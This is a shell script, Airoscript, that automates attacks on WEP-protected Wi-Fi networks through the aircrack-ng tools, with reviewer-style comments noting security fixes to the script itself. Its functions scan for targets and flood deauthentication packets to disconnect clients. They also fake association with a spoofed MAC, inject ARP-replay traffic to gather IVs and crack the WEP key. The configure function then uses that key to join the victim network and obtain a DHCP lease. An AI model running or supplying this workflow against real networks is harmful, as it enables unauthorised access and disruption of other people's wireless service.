#! /bin/sh
# 	Program:		Airoscript
# 	Author: 		Base Code by Daouid & Mods and Tweaks by CurioCT
# 	Date: 		19.09.2006
# 	Version:		1.7 RC7
#	Dependencies:		aircrack-ng, xterm (needs an X Window System), grep, awk, drivers capable of injection.


#	Wireless interface every command below operates on.
#	Leave the value empty to be asked for an interface at start-up.
WIFI=rausb0
#	Packets per second handed to aireplay-ng through -x.
INJECTRATE=1000
#	Count handed to aireplay-ng --deauth.
DEAUTHTIME=5
#	Delay handed to aireplay-ng --fakeauth (time between re-associations).
AUTHDELAY=25
#	Fudge factor handed to aircrack-ng through -f.
FUDGEFACTOR=2
#	Names (or full paths) of the aircrack-ng suite binaries.
AIRMON=airmon-ng
AIRODUMP=airodump-ng
AIREPLAY=aireplay-ng
AIRCRACK=aircrack-ng
#	Directory for capture and key files; it must already exist.
#	The script runs "rm -rf" with wildcards below this directory and stores
#	the recovered key in it, and the default is shared with every other
#	local user, so a private directory is the safer choice.
DUMP_PATH=/tmp
#	Source MAC address used for fake authentication and injection.
FAKE_MAC=00:01:02:03:04:05
#	1 makes debug() pass -hold to every xterm.
DEBUG=0
#	Numbers offered by the main "select" menu; only 1-10 have an action.
CHOICES="1 2 3 4 5 6 7 8 9 10 11 12 13 14 15"

#########################################
#	Functions		
function monitor_interface {
	# Run "$AIRMON start $WIFI" and keep only the output lines that
	# mention "monitor"; the result is left in the global IS_MONITOR.
	IS_MONITOR=$($AIRMON start $WIFI | grep monitor)
	clear
	# Left unquoted as in the original, so several matching lines are
	# printed on one line separated by single spaces.
	echo $IS_MONITOR
}
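function setinterface {
	# Candidate interfaces: first column of every iwconfig line that
	# mentions ESSID, minus names containing "lo" or matching "inet*".
	# The pattern is quoted so the shell cannot expand it against files
	# in the current directory before grep sees it.
	INTERFACES=$(iwconfig | grep ESSID | awk '{ print $1 }' | grep -v lo | grep -v 'inet*')
	clear
	# The original test was "[ $WIFI =  ]": with WIFI set it is a syntax
	# error inside test (reported on stderr) and only reached the else
	# branch by accident. -z states the intent: ask only when WIFI is empty.
	if [ -z "$WIFI" ]; then
		echo "Choose wich network interface you would like to use:"
		echo " "
		# select stores the chosen word in WIFI; one answer is enough.
		select WIFI in $INTERFACES; do
			break
		done
		clear
		echo "Interface set to: $WIFI"
	else
		clear
	fi
}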
function debug {
	# Sets the global HOLD, which every xterm call in this script expands
	# unquoted: "-hold" when DEBUG is 1, empty otherwise.
	clear
	HOLD=""
	if [ $DEBUG = 1 ]; then
		printf '%s\n' "Debug Mode On" " "
		HOLD="-hold"
	fi
	clear
}
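function aircrackversioncheck {
	# Determine the installed aircrack-ng version and set:
	#   acversion - second word of the banner line containing "Aircrack-ng"
	#   acv       - "1" for 0.6 and 0.6.1, "2" for anything else
	#               (crack() adds -x1 only when acv is "1")
	#
	# The banner is read straight from a pipe. The original wrote it to
	# $DUMP_PATH/aircrackout.txt first: a fixed file name in a directory
	# that defaults to /tmp, removed with "rm -rf" and re-created by a
	# redirect, which another local user can pre-create or symlink.
	# The binary is taken from $AIRCRACK like everywhere else in the
	# script instead of a hard-coded "aircrack-ng".
	acversion=$($AIRCRACK | grep Aircrack-ng | awk '{ print $2 }')
	case "$acversion" in
		0.6 | 0.6.1) acv="1" ;;
		*) acv="2" ;;
	esac
}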
function blankssid {
	# Ask whether to type the SSID by hand; loops until the answer is 1 or 2.
	#   1 -> Host_ssidinput reads it from the keyboard
	#   2 -> Host_SSID is set to the empty string
	while :; do
		clear
		printf '%s\n' \
			"" \
			"A Blank SSID has been detected would you like to manually configure the SSID?" \
			"" \
			"1) Yes " \
			"2) No "
		read yn
		echo ""
		case $yn in
			1) Host_ssidinput; break ;;
			2) Host_SSID=""; break ;;
			*) echo "unknown response. Try again" ;;
		esac
	done
}
function Host_ssidinput {
	# Read the ESSID from the keyboard into the global Host_SSID and
	# echo it back.
	printf '%s' "OK, now type in the ESSID "
	read Host_SSID
	# Unquoted as in the original: the echoed text is word-split.
	echo You typed $Host_SSID
	# Only replaces this function's own positional parameters; nothing
	# below reads them.
	set -- ${Host_SSID}
	clear
}
function Scan {
	clear
	# Remove captures left by an earlier scan before starting a new one.
	rm -rf $DUMP_PATH/dump*
	# One xterm running airodump-ng with "-c 0" (the mode the scan menu
	# labels channel hopping), writing to $DUMP_PATH/dump.
	xterm $HOLD \
		-title "Scanning for targets" \
		-geometry 100x50+0+0 -bg "#000000" -fg "#D7C5FF" \
		-e $AIRODUMP --ivs -w $DUMP_PATH/dump -c 0 $WIFI
}
function clientdetect {
	clear
	# Remove captures left by an earlier scan.
	rm -rf $DUMP_PATH/dump*
	# Background xterm: airodump-ng fixed on the target's channel.
	xterm $HOLD \
		-title "Scanning for targets" \
		-geometry 100x50+0+0 -bg "#000000" -fg "#D7C5FF" \
		-e $AIRODUMP --ivs -w $DUMP_PATH/dump -c $Host_CHAN $WIFI &
	# Foreground xterm: aireplay-ng --deauth against $Host_MAC; the
	# function returns when this window closes.
	xterm $HOLD \
		-geometry 84x25+0+600 -bg "#000000" -fg "#F2FF00" \
		-title "Sending Deauth Packets to: $Host_MAC" \
		-e $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC $WIFI
}
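function Scanchan {
	# Print the prompt given as $1 and read one line into the global
	# "answer". Returns the status of read (non-zero at end of input).
	# The prompt is quoted: it contains a "?", which the unquoted original
	# let the shell expand against one-character file names.
	GetAnswer ()
	{
		prompt=$1
		echo -n "$prompt"
		read -r answer
	}
	echo " "
	# The original passed the reply back through "return $answer", which
	# only carries 0-255 and turns any non-numeric reply into a shell
	# error. The reply is now checked to be digits only before it is
	# placed on a command line, and asked for again otherwise.
	while true; do
		GetAnswer "On which channel would you like to scan ? ==> _" || return 1
		case "$answer" in
			'' | *[!0-9]*) echo "Channel must be a number. Try again" ;;
			*) break ;;
		esac
	done
	channel_number=$answer
	clear
	# ${DUMP_PATH:?} aborts instead of expanding to "/dump*" when the
	# directory setting is empty.
	rm -rf -- "${DUMP_PATH:?}"/dump*
	xterm $HOLD -title "Scanning for targets on channel $channel_number" -geometry 100x50+0+0 -bg "#000000" -fg "#D7C5FF" -e $AIRODUMP --ivs -w $DUMP_PATH/dump -c "$channel_number" $WIFI
}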
function Parseforap {
	# Build the target list from the capture file: for every line that
	# mentions WEP, glue columns 1, 6 and 16 together and drop entries
	# containing 00:00:00:00. The code below splits each entry on ","
	# into MAC, channel and SSID, so the columns are presumably stored
	# with trailing commas - confirm against the airodump-ng output.
	# NOTE(review): these values are whatever the capture recorded for
	# networks in range; Host_SSID in particular is later used unquoted
	# in file paths and command lines.
	HOST=$(cat $DUMP_PATH/dump-01.txt | grep WEP | awk '{ print $1 $6 $16}' | grep -v 00:00:00:00)
	clear
	printf '%s\n' "Select target" ""
	select TARGET in $HOST; do
		Host_MAC=$(echo $TARGET | awk '{ split($1, info, ","); print info[1] }')
		Host_CHAN=$(echo $TARGET | awk '{ split($1, info, ","); print info[2] }')
		Host_SSID=$(echo $TARGET | awk '{ split($1, info, ","); print info[3] }')
		export Host_MAC Host_CHAN Host_SSID
		break
	done
}
function Parseforap2 {
	# Same as Parseforap, except that the SSID is taken from column 17
	# of the capture line instead of column 16.
	# NOTE(review): these values are whatever the capture recorded for
	# networks in range; Host_SSID in particular is later used unquoted
	# in file paths and command lines.
	HOST=$(cat $DUMP_PATH/dump-01.txt | grep WEP | awk '{ print $1 $6 $17}' | grep -v 00:00:00:00)
	clear
	printf '%s\n' "Select target" ""
	select TARGET in $HOST; do
		Host_MAC=$(echo $TARGET | awk '{ split($1, info, ","); print info[1] }')
		Host_CHAN=$(echo $TARGET | awk '{ split($1, info, ","); print info[2] }')
		Host_SSID=$(echo $TARGET | awk '{ split($1, info, ","); print info[3] }')
		export Host_MAC Host_CHAN Host_SSID
		break
	done
}
function choosewep {
	# Pick the parser that matches how airodump-ng listed the target:
	#   1 ("WEP")  -> Parseforap2
	#   2 ("WEP?") -> Parseforap
	while :; do
		clear
		printf '%s\n' \
			"" \
			"How was your target listed in airodump-ng? (WEP or WEP?)" \
			"" \
			"1) WEP " \
			"2) WEP?"
		read yn
		echo ""
		case $yn in
			1) Parseforap2; break ;;
			2) Parseforap; break ;;
			*) echo "unknown response. Try again" ;;
		esac
	done
}
function choosescan {
	# Scan menu: 1 runs Scan (all channels), 2 runs Scanchan (one channel).
	while :; do
		clear
		printf '%s\n' \
			"Airodump will be launched in a new window, hit ctrl+c when target(s) is found" \
			"" \
			"Do you want to scan on multiple channels or on a specific channel?" \
			"" \
			"1) Channel Hoping " \
			"2) Specific channel "
		read yn
		echo ""
		case $yn in
			1) Scan; break ;;
			2) Scanchan; break ;;
			*) echo "unknown response. Try again" ;;
		esac
	done
}
function choosetarget {
	# Client selection menu:
	#   1 -> askclientsel
	#   2 -> no client
	#   3 -> clientdetect, then clientfound if clientdetect succeeded
	while :; do
		clear
		printf '%s\n' \
			"" \
			"Do you want to select a client now ?" \
			"" \
			"1) Yes " \
			"2) No " \
			"3) Try to detect associated client"
		read yn
		echo ""
		case $yn in
			1) askclientsel; break ;;
			2) break ;;
			3) clientdetect && clientfound; break ;;
			*) echo "unknown response. Try again" ;;
		esac
	done
}
function clientfound {
	# After a detection run: 1 opens listsel2 to pick the client, 2 skips.
	while :; do
		clear
		printf '%s\n' \
			"" \
			"Did you find desired client?" \
			"" \
			"1) Yes " \
			"2) No "
		read yn
		echo ""
		case $yn in
			1) listsel2; break ;;
			2) break ;;
			*) echo "unknown response. Try again" ;;
		esac
	done
}
function choosedeauth {
	# Deauth menu: 1 -> de_auth, 2 -> de_auth_fake, 3 -> de_auth_client.
	while :; do
		clear
		printf '%s\n' \
			"" \
			"What kind of deauth do you want to do ?" \
			"" \
			"1) Everybody " \
			"2) Myself " \
			"3) Selected Client"
		read yn
		echo ""
		case $yn in
			1) de_auth; break ;;
			2) de_auth_fake; break ;;
			3) de_auth_client; break ;;
			*) echo "unknown response. Try again" ;;
		esac
	done
}
function solointeractiveattack {
	# Background xterm: aireplay-ng --interactive against $Host_MAC.
	# No airodump-ng capture is started here, unlike interactiveattack.
	xterm $HOLD \
		-title "Interactive Packet Sel on: $Host_SSID" \
		-geometry 82x25-0+0 -bg "#000000" -fg "#1DFF00" \
		-e $AIREPLAY $WIFI --interactive -b $Host_MAC -d FF:FF:FF:FF:FF:FF -x $INJECTRATE &
	# Foreground xterm: aireplay-ng --deauth for $Client_MAC.
	xterm $HOLD \
		-title "Kicking $Client_MAC from : $Host_SSID" \
		-geometry 84x25+0-0 -bg "#000000" -fg "#F2FF00" \
		-e $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC -c $Client_MAC $WIFI
}
function attacktype {
	# Attack menu; each number maps to one launcher function:
	#   1 attack, 2 attackclient, 3 interactiveattack,
	#   4 fakeinteractiveattack, 5 solointeractiveattack
	while :; do
		clear
		printf '%s\n' \
			"" \
			"Do you want perform attack using a fake mac or a selected client?" \
			"" \
			"1) Fake MAC" \
			"2) Using selected client " \
			"3) Interactive attack using selected client" \
			"4) Interactive attack using Fake MAC" \
			"5) Solo interactive attack (attempt to jump start stalled injections)"
		read yn
		echo ""
		case $yn in
			1) attack; break ;;
			2) attackclient; break ;;
			3) interactiveattack; break ;;
			4) fakeinteractiveattack; break ;;
			5) solointeractiveattack; break ;;
			*) echo "unknown response. Try again" ;;
		esac
	done
}
function askclientsel {
	# How to choose the client: 1 -> asklistsel (from the capture),
	# 2 -> clientinput (typed MAC address).
	while :; do
		clear
		printf '%s\n' \
			"" \
			"Do you want to select the client from a list or enter MAC address manually ?" \
			"" \
			"1) Detected clients " \
			"2) Manual Input "
		read yn
		echo ""
		case $yn in
			1) asklistsel; break ;;
			2) clientinput; break ;;
			*) echo "unknown response. Try again" ;;
		esac
	done
}
function clientinput {
	# Read the client MAC address from the keyboard into the global
	# Client_MAC and echo it back. The value is not validated here.
	printf '%s' "OK, now type in your client MAC: "
	read Client_MAC
	# Unquoted as in the original: the echoed text is word-split.
	echo You typed: $Client_MAC
	# Only replaces this function's own positional parameters; nothing
	# below reads them.
	set -- ${Client_MAC}
}
function asklistsel {
	# Choose the client list: 1 -> listsel1 (every MAC in the capture),
	# 2 -> listsel2 (stations on the target's lines only).
	while :; do
		clear
		# An SSID that is a lone carriage return is replaced by a
		# readable placeholder; presumably that is how a blank ESSID
		# column arrives from the capture file - confirm.
		if [ "$Host_SSID" = $'\r' ]; then
			Host_SSID="No SSID has been detected!"
		fi
		printf '%s\n' \
			"" \
			"Do you want to select the client from full list or associated clients only ?" \
			"1) Full list (All MAC detected, even Host are listed)" \
			"2) Only associated clients (Client connected to this SSID : $Host_SSID)" \
			""
		read yn
		case $yn in
			1) listsel1; break ;;
			2) listsel2; break ;;
			*) echo "unknown response. Try again" ;;
		esac
	done
}
function listsel1 {
	# Every first column of the capture file that matches the loose MAC
	# pattern, except entries containing 00:00:00:00.
	HOST=$(cat $DUMP_PATH/dump-01.txt | grep "0.:..:..:..:.." | awk '{ print $1 }' | grep -v 00:00:00:00)
	clear
	printf '%s\n' "Select wich client you want to use for ARP replay" ""
	select CLIENT in $HOST; do
		# Keep the part before the first comma as the client MAC.
		Client_MAC=$(echo $CLIENT | awk '{ split($1, info, ","); print info[1] }')
		export Client_MAC
		break
	done
}
function listsel2 {
	# First column of every capture line that mentions the target MAC,
	# minus the target itself and entries containing 00:00:00:00.
	# NOTE(review): $Host_MAC is used unquoted as a grep pattern, so it
	# is interpreted as a regular expression and word-split.
	HOST=$(cat $DUMP_PATH/dump-01.txt | grep $Host_MAC | awk '{ print $1 }' | grep -v 00:00:00:00 | grep -v $Host_MAC)
	clear
	printf '%s\n' "Select which client you want to use for ARP replay" ""
	echo "The client(s) listed bellow is(are) connected to ==> "$Host_SSID
	echo ""
	select CLIENT in $HOST; do
		# Keep the part before the first comma as the client MAC.
		Client_MAC=$(echo $CLIENT | awk '{ split($1, info, ","); print info[1] }')
		export Client_MAC
		break
	done
}
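function cleanup {
	# Reset: stop the helper processes, power-cycle the card and put the
	# interface back into monitor mode.
	#
	# The original brought "rausb0" down and up regardless of which
	# interface was selected; the configured $WIFI is used instead so the
	# reset acts on the same device as the rest of the script.
	# killall sends SIGKILL in the background; its output is discarded.
	killall -9 aireplay-ng airodump-ng > /dev/null &
	ifconfig "$WIFI" down
	cardctl eject
	sleep 2
	cardctl insert
	ifconfig "$WIFI" up
	# channel_number is only set once Scanchan has run; left unquoted so
	# an unset value adds no argument.
	$AIRMON start $WIFI $channel_number
	iwconfig $WIFI
}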
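function attack {
	# Host_SSID comes from the capture file or from the keyboard, so it is
	# checked before it reaches "rm -rf". Unquoted and unchecked, an empty
	# value turned the glob into $DUMP_PATH/*, and a "/" or a leading "."
	# let it match files that are not captures of this network. In those
	# cases the clean-up is skipped and old captures are left in place.
	case "$Host_SSID" in
		'' | */* | .*)
			echo "Skipping capture cleanup: SSID is empty or not a plain file name" >&2
			;;
		*)
			rm -rf -- "${DUMP_PATH:?}/$Host_SSID"*
			;;
	esac
	# Four xterms, the first three in the background: airodump-ng capture,
	# aireplay-ng --arpreplay, aireplay-ng --fakeauth and aireplay-ng
	# --deauth, the last three using $FAKE_MAC. The commands are unchanged.
	xterm $HOLD -title "Capturing IVs from $Host_SSID" -geometry 84x25+0+0 -bg "#000000" -fg "#D7C5FF" -e $AIRODUMP --ivs -c $Host_CHAN $WIFI -w $DUMP_PATH/$Host_SSID &
	xterm $HOLD -title "Injection Thread" -geometry 82x25-0+0 -bg "#000000" -fg "#1DFF00" -e $AIREPLAY $WIFI --arpreplay -b $Host_MAC -h $FAKE_MAC  -x $INJECTRATE &
	xterm $HOLD -title "Associating with: $Host_SSID" -geometry 82x25-0-0 -bg "#000000" -fg "#FF0009" -e $AIREPLAY --fakeauth $AUTHDELAY -e $Host_SSID -a $Host_MAC -h $FAKE_MAC $WIFI &
	xterm $HOLD -title "Kicking Ourself from: $Host_SSID" -geometry 84x25+0-0 -bg "#000000" -fg "#F2FF00" -e $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC -c $FAKE_MAC $WIFI
}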
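function attackclient {
	# Host_SSID comes from the capture file or from the keyboard, so it is
	# checked before it reaches "rm -rf". Unquoted and unchecked, an empty
	# value turned the glob into $DUMP_PATH/*, and a "/" or a leading "."
	# let it match files that are not captures of this network. In those
	# cases the clean-up is skipped and old captures are left in place.
	case "$Host_SSID" in
		'' | */* | .*)
			echo "Skipping capture cleanup: SSID is empty or not a plain file name" >&2
			;;
		*)
			rm -rf -- "${DUMP_PATH:?}/$Host_SSID"*
			;;
	esac
	# Three xterms, the first two in the background: airodump-ng capture,
	# aireplay-ng --arpreplay and aireplay-ng --deauth, both using
	# $Client_MAC. The commands are unchanged.
	xterm $HOLD -title "Capturing IVs from $Host_SSID with Airodump" -geometry 84x25+0+0 -bg "#000000" -fg "#D7C5FF" -e $AIRODUMP --ivs -c $Host_CHAN $WIFI -w $DUMP_PATH/$Host_SSID &
	xterm $HOLD -title "Injection Thread Host : $Host_MAC CLient : $Client_MAC" -geometry 82x25-0+0 -bg "#000000" -fg "#1DFF00" -e $AIREPLAY $WIFI --arpreplay -b $Host_MAC -h $Client_MAC -x $INJECTRATE &
	xterm $HOLD -title "Kicking $Client_MAC from : $Host_SSID" -geometry 84x25+0-0 -bg "#000000" -fg "#F2FF00" -e $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC -c $Client_MAC $WIFI
}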
function de_auth {
	# One foreground xterm running aireplay-ng --deauth with only the
	# access point address (-a) and no client address.
	local title="Sending Deauth Packets to: $Host_MAC"
	xterm $HOLD \
		-geometry 84x25+0+600 -bg "#000000" -fg "#F2FF00" \
		-title "$title" \
		-e $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC $WIFI
}
function de_auth_fake {
	# One foreground xterm running aireplay-ng --deauth with $FAKE_MAC
	# as the client address (-c).
	local title="Kicking Ourself from: $Host_SSID"
	xterm $HOLD \
		-geometry 84x25+0+600 -bg "#000000" -fg "#F2FF00" \
		-title "$title" \
		-e $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC -c $FAKE_MAC $WIFI
}
function de_auth_client {
	# One foreground xterm running aireplay-ng --deauth with the
	# selected $Client_MAC as the client address (-c).
	local title="Kicking $Client_MAC from: $Host_SSID"
	xterm $HOLD \
		-geometry 84x25+0+600 -bg "#000000" \
		-title "$title" \
		-fg "#F2FF00" \
		-e $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC -c $Client_MAC $WIFI
}
function fckauth {
	# One foreground xterm running aireplay-ng --fakeauth with
	# $FAKE_MAC as the source address (-h).
	# NOTE(review): $Host_SSID is passed unquoted after -e, so an empty or
	# multi-word SSID shifts the remaining arguments.
	local title="Associating with $Host_SSID using $FAKE_MAC"
	xterm $HOLD \
		-geometry 82x25+600+600 -bg "#000000" -fg "#B60626" \
		-title "$title" \
		-e $AIREPLAY --fakeauth $AUTHDELAY -e $Host_SSID -a $Host_MAC -h $FAKE_MAC $WIFI
}
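function interactiveattack {
	# Host_SSID comes from the capture file or from the keyboard, so it is
	# checked before it reaches "rm -rf". Unquoted and unchecked, an empty
	# value turned the glob into $DUMP_PATH/*, and a "/" or a leading "."
	# let it match files that are not captures of this network. In those
	# cases the clean-up is skipped and old captures are left in place.
	case "$Host_SSID" in
		'' | */* | .*)
			echo "Skipping capture cleanup: SSID is empty or not a plain file name" >&2
			;;
		*)
			rm -rf -- "${DUMP_PATH:?}/$Host_SSID"*
			;;
	esac
	# Three xterms, the first two in the background: airodump-ng capture,
	# aireplay-ng --interactive and aireplay-ng --deauth for $Client_MAC.
	# The commands are unchanged.
	xterm $HOLD -title "Capturing IVs from $Host_SSID" -geometry 84x25+0+0 -bg "#000000" -fg "#D7C5FF" -e $AIRODUMP --ivs -c $Host_CHAN $WIFI -w $DUMP_PATH/$Host_SSID &
	xterm $HOLD -title "Interactive Packet Sel on: $Host_SSID" -geometry 82x25-0+0 -bg "#000000" -fg "#1DFF00" -e $AIREPLAY $WIFI --interactive -b $Host_MAC -d FF:FF:FF:FF:FF:FF -x $INJECTRATE -t 1 -f 0 -m 68 -n 68  &
	xterm $HOLD -title "Kicking $Client_MAC from : $Host_SSID" -geometry 84x25+0-0 -bg "#000000" -fg "#F2FF00" -e $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC -c $Client_MAC $WIFI
}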
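function fakeinteractiveattack {
	# Host_SSID comes from the capture file or from the keyboard, so it is
	# checked before it reaches "rm -rf". Unquoted and unchecked, an empty
	# value turned the glob into $DUMP_PATH/*, and a "/" or a leading "."
	# let it match files that are not captures of this network. In those
	# cases the clean-up is skipped and old captures are left in place.
	case "$Host_SSID" in
		'' | */* | .*)
			echo "Skipping capture cleanup: SSID is empty or not a plain file name" >&2
			;;
		*)
			rm -rf -- "${DUMP_PATH:?}/$Host_SSID"*
			;;
	esac
	# Four xterms, the first three in the background: airodump-ng capture,
	# aireplay-ng --interactive, aireplay-ng --fakeauth and aireplay-ng
	# --deauth, the last two using $FAKE_MAC. The commands are unchanged.
	xterm $HOLD -title "Capturing IVs from $Host_SSID" -geometry 84x25+0+0 -bg "#000000" -fg "#D7C5FF" -e $AIRODUMP --ivs -c $Host_CHAN $WIFI -w $DUMP_PATH/$Host_SSID &
	xterm $HOLD -title "Interactive Packet Sel on Host: $Host_SSID" -geometry 82x25-0+0 -bg "#000000" -fg "#1DFF00" -e $AIREPLAY $WIFI --interactive -b $Host_MAC -d FF:FF:FF:FF:FF:FF -x $INJECTRATE -t 1 -f 0 -m 68 -n 68  &
	xterm $HOLD -title "Fake association" -geometry 82x25-0-0 -bg "#000000" -fg "#FF0009" -e $AIREPLAY --fakeauth $AUTHDELAY -e $Host_SSID -a $Host_MAC -h $FAKE_MAC $WIFI &
	xterm $HOLD -title "Kicking Ourself from : $Host_SSID" -geometry 84x25+0-0 -bg "#000000" -fg "#F2FF00" -e $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC -c $FAKE_MAC $WIFI
}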
function crack   {
	# Run aircrack-ng on $DUMP_PATH/$Host_SSID-01.ivs in an xterm that
	# always stays open (-hold). -x1 is added only when
	# aircrackversioncheck set acv to "1" (versions 0.6 and 0.6.1).
	local x1_opt=""
	if [ "$acv" = "1" ]; then
		x1_opt="-x1"
	fi
	# $x1_opt is unquoted so that it disappears when empty.
	xterm $HOLD -geometry 84x25+0-0 \
		-title "Aircracking this Access Point $Host_SSID" -hold \
		-e $AIRCRACK -a 1 -b $Host_MAC $x1_opt -f $FUDGEFACTOR -0 $DUMP_PATH/$Host_SSID-01.ivs
}
function menu {
	# Print the detected aircrack-ng version followed by the main menu.
	# $acversion stays unquoted so an empty value leaves no extra word.
	echo $acversion " is your aircrack-ng version number"
	printf '%s\n' \
		"" \
		"1.  Scan      ==> Launch a Scan to find targets" \
		"2.  Select    ==> Select desired target: Host and Client" \
		"3.  Attack    ==> Launch attack" \
		"4.  Crack     ==> Starts searching for WEP key with aircrack" \
		"5.  Configure ==> Configure PC to connect using WEP key found and DHCP" \
		"" \
		"6.  Associate ==> Try to associate to AP using a FAKE MAC" \
		"7.  Deauth    ==> Disconnect desired station(s) from target" \
		"8.  Reset     ==> Kills all airo-threads and reset card(pcmcia socket)" \
		"9.  Monitor   ==> Enable monitor mode using airmon-ng" \
		"10. Quit  " \
		" "
}
function target {
		# Clear the screen and print the currently selected SSID, MAC address
		# and channel. The variables are appended unquoted, so each value is
		# word-split and glob-expanded before echo prints it.
		clear
		echo "Selected target      ==> "$Host_SSID
		echo "Has this MAC         ==> "$Host_MAC
		echo "And is on channel    ==> "$Host_CHAN
}   	
function configure {
		# Run aircrack-ng once more on the capture, read the key from its
		# output and configure $WIFI as a managed-mode client with that key,
		# then request a DHCP lease and start a ping.
		#
		# "&>" sends stdout and stderr of aircrack-ng to
		# $DUMP_PATH/$Host_SSID.key.
		# NOTE(review): the key file is created under DUMP_PATH (default /tmp)
		# with whatever permissions the current umask gives, and its name
		# contains the unquoted SSID - confirm this is acceptable where the
		# script is run.
		$AIRCRACK -a 1 -b $Host_MAC -x1 -f $FUDGEFACTOR -0 $DUMP_PATH/$Host_SSID-01.ivs &> $DUMP_PATH/$Host_SSID.key
		# Fourth word of the line(s) containing "KEY" in that output.
		KEY=`cat $DUMP_PATH/$Host_SSID.key | grep KEY | awk '{ print $4 }'`
		# The key is printed to the terminal here and in the messages below.
		echo "Using this key $KEY to connect to: $Host_SSID"
		echo ""
		echo "Setting: iwconfig $WIFI mode Managed"
		# Cycle the interface before reconfiguring it.
		ifconfig $WIFI down
		sleep 3
		ifconfig $WIFI up
		sleep 2
		# All settings in one call; the same settings are then repeated one by
		# one and once more combined, presumably to cope with drivers that
		# ignore some of them - confirm.
		# NOTE(review): the key is passed on the iwconfig command line.
		iwconfig $WIFI mode Managed ap any rate auto channel $Host_CHAN essid $Host_SSID key restricted $KEY 
		sleep 1
		echo "Setting: iwconfig $WIFI essid $Host_SSID"
		iwconfig $WIFI essid $Host_SSID
		echo "Setting: iwconfig $WIFI key $KEY"
		iwconfig $WIFI key restricted $KEY
		echo "Setting: dhcpcd $WIFI"
		sleep 1
		iwconfig $WIFI rate auto
		iwconfig $WIFI ap any
		sleep 3
		iwconfig $WIFI ap any rate auto mode Managed channel $Host_CHAN essid $Host_SSID key restricted $KEY
		sleep 3
		dhcpcd $WIFI
		echo "Will now ping google.com"
		# No count is given, so ping runs until it is interrupted.
		ping www.google.com
}
#########################################
#            Main Section		
	clear
	# Start-up: pick the interface, detect the aircrack-ng version, apply
	# the DEBUG setting, then show the menu once.
	setinterface
	aircrackversioncheck
	debug
	menu
# Main loop: select offers the numbers in $CHOICES; anything without an
# action (11-15 or an invalid reply) falls through to the default arm.
select choix in $CHOICES; do
	case "$choix" in
		1)
			choosescan
			clear
			menu
			echo "Airodump closed, now use option 2 to select target"
			echo " "
			;;
		2)
			choosewep
			clear
			choosetarget
			# A blank SSID (lone carriage return, or the placeholder set
			# by asklistsel) goes through blankssid first.
			case "$Host_SSID" in
				$'\r' | "No SSID has been detected!")
					blankssid
					target
					echo "Selected client      ==> "$Client_MAC
					menu
					;;
				*)
					target
					echo "Selected client      ==> "$Client_MAC
					echo " "
					menu
					;;
			esac
			;;
		3)
			attacktype
			clear
			echo "Attack starting with variables set to :"
			target
			echo "Selected client      ==> "$Client_MAC
			sleep 2
			menu
			;;
		4)
			echo "launching aircrack, if aircrack shell closes quickly, try again with more IVs"
			crack
			menu
			;;
		5)
			configure
			menu
			;;
		6)
			echo launching fake auth commands
			# fckauth runs in the background so the menu returns at once.
			fckauth & menu
			;;
		7)
			choosedeauth
			menu
			;;
		8)
			echo "Will restart pcmcia bus and kill all airodump-ng and aireplay-ng threads"
			cleanup
			menu
			;;
		9)
			monitor_interface
			menu
			;;
		10)
			echo Script terminated
			exit
			;;
		*)
			clear
			menu
			echo " "
			echo "Wrong value, please try again without your boxing gloves on"
			echo " "
			;;
	esac
done
#END

